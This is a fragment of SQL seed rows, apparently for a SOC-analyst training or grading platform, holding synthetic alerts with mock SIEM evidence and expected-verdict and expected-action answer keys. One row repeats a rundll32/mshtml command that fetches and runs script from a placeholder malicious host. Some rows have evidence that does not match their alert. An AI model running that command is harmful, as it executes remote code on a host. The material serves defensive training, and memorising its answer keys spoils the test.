'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.774Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:34Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"network_service\\\",\\\"hostname\\\":\\\"internal-server-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1313, 'Potential Privilege Escalation via IAM Policy Change', 'high', 'AWS GuardDuty', 'An IAM policy was altered to grant additional privileges to a user, possibly indicating a privilege escalation attempt.', 'Privilege Escalation', 'T1068', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T12:05:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"198.51.100.100\",\"dst_ip\":null,\"username\":\"policy_admin\",\"hostname\":\"iam-management-console\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with unauthorized IAM changes\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"policy_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User with permissions to modify IAM policies\"}}],\"expected_actions\":[\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"privilege_escalation\",\"analysis_notes\":\"The unauthorized change to IAM policies suggests an attempt to gain elevated privileges, potentially leading to further exploitation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.775Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T12:05:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"198.51.100.100\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"policy_admin\\\",\\\"hostname\\\":\\\"iam-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1314, 'APT-Level Malware Detected via Fileless Technique', 'critical', 'Recorded Future', 'A sophisticated fileless malware was detected using process hollowing and memory-only payloads, indicative of APT activity.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T14:32:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"workstation01\",\"command_line\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:https://malicious.site/script\\\")\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe javascript:\\\"\\\\..\\\\mshtml,RunHTMLApplication \\\";document.write();GetObject(\\\"script:https://malicious.site/script\\\")\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates fileless malware execution\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT campaign\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious IP and fileless execution technique confirms the alert as a true positive.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.781Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T14:32:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"rundll32.exe javascript:\\\\\\\"\\\\\\\\..\\\\\\\\mshtml,RunHTMLApplication \\\\\\\";document.write();GetObject(\\\\\\\"script:https://malicious.site/script\\\\\\\")\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1315, 'Suspicious Multi-Hop C2 Communication Detected', 'high', 'ThreatConnect', 'Detected multi-hop command and control communication through legitimate services like Slack and GitHub, indicating possible APT activity.', 'C2 Communication', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T08:27:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"104.244.42.65\",\"dst_ip\":\"192.168.1.15\",\"username\":\"admin\",\"hostname\":\"server02\",\"domain\":\"slack.com\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.244.42.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain used for obfuscation\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2_communication\",\"analysis_notes\":\"The use of legitimate services for C2 communication is a hallmark of advanced persistent threats, confirming the alert.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"104.244.42.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"104.244.42.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"104.244.42.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"104.244.42.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.785Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T08:27:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"104.244.42.65\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server02\\\",\\\"domain\\\":\\\"slack.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1316, 'Detected DGA Domain Activity Indicative of APT Campaign', 'critical', 'MISP', 'A domain generated by a Domain Generation Algorithm (DGA) was detected, commonly used by APT actors for stealthy communication.', 'DGA Activity', 'T1568', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T11:04:21Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"198.51.100.10\",\"username\":\"bsmith\",\"hostname\":\"desktop03\",\"domain\":\"xylznbqweu.com\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple DGA campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xylznbqweu.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain identified as part of DGA activity\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"dga_activity\",\"analysis_notes\":\"The detection of a DGA domain strongly suggests APT involvement, confirming this alert as a true positive.\"}', 'Expert', 'TI', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.787Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T11:04:21Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"desktop03\\\",\\\"domain\\\":\\\"xylznbqweu.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1317, 'Detected Brute Force Attack from Suspicious IP', 'high', 'Anomali', 'A high number of failed login attempts were detected from a foreign IP address, suggesting a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.30\",\"username\":\"mjohnson\",\"hostname\":\"server04\",\"failed_attempts\":47}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 432 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjohnson\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username involved in brute force attempt\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts from a known malicious IP confirms the alert as a true positive.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:54:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:53:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:52:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"},{\"timestamp\":\"2026-03-02T13:51:06.789Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-01T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"mjohnson\\\",\\\"hostname\\\":\\\"server04\\\",\\\"failed_attempts\\\":47}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1318, 'Phishing Attempt Detected via Spoofed Domain', 'medium', 'Proofpoint', 'A phishing email was detected containing a link to a spoofed domain designed to mimic a legitimate financial institution.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-01T12:14:33Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.75\",\"dst_ip\":\"192.168.1.50\",\"username\":\"kthompson\",\"hostname\":\"laptop01\",\"email_sender\":\"alert@secure-finance.com\",\"url\":\"http://secure-f1nance.com/login\"}', '2026-03-01 22:54:22', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 254 times for phishing activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-f1nance.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as part of phishing campaign\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"alert@secure-finance.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email sender domain closely resembles a legitimate domain\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing URL and spoofed email domain confirm the alert as a true positive.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected via Spoofed Domain\",\"date\":\"2026-03-02T13:55:06.792Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
